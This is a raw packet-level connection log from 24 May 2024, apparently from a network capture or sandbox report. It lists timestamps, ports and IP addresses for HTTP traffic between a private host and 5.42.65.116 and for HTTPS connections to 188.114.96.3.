May 24, 2024 00:22:02.772198915 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.772211075 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.772221088 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.772268057 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.772268057 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.773097992 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.773109913 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.773164034 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.773164034 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.773930073 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.773941994 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.774209023 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.774585009 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.774596930 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.774606943 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.774648905 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.774648905 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.775268078 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.775279999 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.775546074 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.775957108 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.775970936 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.776036978 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.776590109 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.776601076 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.776650906 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.777287006 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.777299881 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.777344942 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.777344942 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.778003931 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.778016090 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.778023958 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.778075933 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.778075933 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.778676987 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.778687000 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.778918028 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.779351950 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.779364109 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.779414892 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.779414892 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.780005932 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.780018091 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.780536890 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.780708075 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.780719995 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.780728102 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.780782938 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.780798912 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.781416893 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.781430006 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.781608105 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.782074928 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.782085896 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.782128096 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.782128096 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.782715082 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.782726049 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.782735109 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.782780886 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.782782078 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.783683062 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.783695936 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.783704042 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.783723116 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.783740997 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.783767939 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.783767939 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.784638882 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.784651041 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.784658909 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.784708023 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.784708023 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.785598040 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.785609961 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.785619020 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.785672903 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.785672903 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.786509991 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.786520004 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.786530018 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.786535978 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.786576033 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.786576033 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.787472010 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.787483931 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.787502050 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.787524939 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.787542105 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.788367033 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.788378000 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.788388968 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.788431883 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.788431883 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.789237976 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.789249897 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.789259911 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.789264917 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.789288998 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.789892912 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.790108919 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.790121078 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.790131092 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.790164948 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.790182114 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.790977955 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.790988922 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.790997982 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.791034937 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.791122913 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.791807890 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.791820049 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.791830063 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.791841030 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.791862965 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.791891098 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.792638063 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.792649984 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.792654991 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.792721033 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.793431044 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.793442011 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.793454885 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.793476105 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.793493986 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.794203043 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.794214964 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.794224024 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.794234037 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.794281006 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.794281006 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.794979095 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.794991016 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.795001030 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.795028925 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.795049906 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.795717955 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.795731068 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.795741081 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.795783997 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.795804024 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.796483994 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.796495914 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.796504974 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.796518087 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.796538115 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.797240019 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.797252893 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.797261953 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.797291994 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.797291994 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.797600031 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.842379093 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.842992067 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.852221012 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.852339029 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.852376938 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.852376938 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.852588892 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.852601051 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.852722883 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.852787971 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.852847099 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.853033066 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.853045940 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.853096962 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.853096962 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.853429079 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.853441954 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.853498936 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.853498936 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.853722095 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.853735924 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.853744984 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.853756905 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.853769064 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.853787899 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.853787899 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.853816986 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.854573011 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.854585886 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.854731083 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.854995012 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.855050087 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.855288982 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.855303049 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.855314016 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.855324984 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.855336905 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.855349064 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.855374098 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.855453968 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.856165886 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.856178999 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.856189013 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.856200933 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.856247902 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.856247902 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.856980085 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.857150078 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.857228994 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.857240915 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.857250929 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.857263088 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.857275963 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.857299089 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.857321024 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.857321024 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.858129025 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.858140945 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.858150959 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.858163118 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.858187914 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.858211994 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.858972073 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.858984947 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.858999014 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.859011889 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.859025002 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.859025002 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.859071970 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.859071970 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:03.320512056 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:03.325505018 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:03.518780947 CEST	49715	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:03.518872023 CEST	443	49715	188.114.96.3	192.168.2.6
May 24, 2024 00:22:03.518968105 CEST	49715	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:03.520067930 CEST	49715	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:03.520106077 CEST	443	49715	188.114.96.3	192.168.2.6
May 24, 2024 00:22:03.673809052 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:03.715934038 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:04.011485100 CEST	443	49715	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.011687994 CEST	49715	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.013134003 CEST	49715	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.013164043 CEST	443	49715	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.013510942 CEST	443	49715	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.059792995 CEST	49715	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.065088034 CEST	49715	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.067235947 CEST	49715	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.067317963 CEST	443	49715	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.178325891 CEST	49716	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.178375006 CEST	443	49716	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.178445101 CEST	49716	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.185731888 CEST	49716	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.185767889 CEST	443	49716	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.254437923 CEST	49717	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.254467964 CEST	443	49717	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.254580975 CEST	49717	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.255673885 CEST	49717	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.255698919 CEST	443	49717	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.682301044 CEST	443	49716	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.682409048 CEST	49716	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.683821917 CEST	49716	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.683850050 CEST	443	49716	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.684099913 CEST	443	49716	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.731545925 CEST	49716	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.739542007 CEST	49716	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.739581108 CEST	49716	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.739721060 CEST	443	49716	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.754940033 CEST	443	49715	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.755220890 CEST	443	49715	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.755413055 CEST	49715	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.755511045 CEST	49715	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.755511045 CEST	49715	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.755553961 CEST	443	49715	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.755584002 CEST	443	49715	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.758884907 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.758975983 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.759043932 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.759336948 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.759371042 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.803931952 CEST	443	49717	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.804102898 CEST	49717	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.805160046 CEST	49717	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.805187941 CEST	443	49717	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.805454969 CEST	443	49717	188.114.96.3	192.168.2.6
May 24, 2024 00:22:04.856652975 CEST	49717	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.858208895 CEST	49717	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.858258963 CEST	49717	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:04.858402967 CEST	443	49717	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.165910006 CEST	443	49716	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.165982008 CEST	443	49716	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.166212082 CEST	49716	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.167390108 CEST	49716	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.167438030 CEST	443	49716	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.167469025 CEST	49716	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.167484999 CEST	443	49716	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.172481060 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.172524929 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.172611952 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.172883034 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.172913074 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.243197918 CEST	443	49717	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.243284941 CEST	443	49717	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.243489027 CEST	49717	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.243902922 CEST	49717	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.243928909 CEST	443	49717	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.243954897 CEST	49717	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.243966103 CEST	443	49717	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.248577118 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.248620033 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.248692989 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.249068022 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.249084949 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.261861086 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.261941910 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.263396025 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.263401985 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.264020920 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.265182972 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.265201092 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.265314102 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.707345963 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.711601973 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.711695910 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.711733103 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.711766958 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.711899996 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.711908102 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.724263906 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.724328041 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.724335909 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.732822895 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.732903957 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.732948065 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.732980967 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.733256102 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.739587069 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.745138884 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.745203972 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.745232105 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.745311975 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.745378971 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.745385885 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.745513916 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.745899916 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.748148918 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.748171091 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.748184919 CEST	49718	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.748192072 CEST	443	49718	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.758866072 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.758939028 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.780672073 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.780733109 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.782324076 CEST	49721	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.782356024 CEST	443	49721	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.782507896 CEST	49721	443	192.168.2.6	188.114.96.3
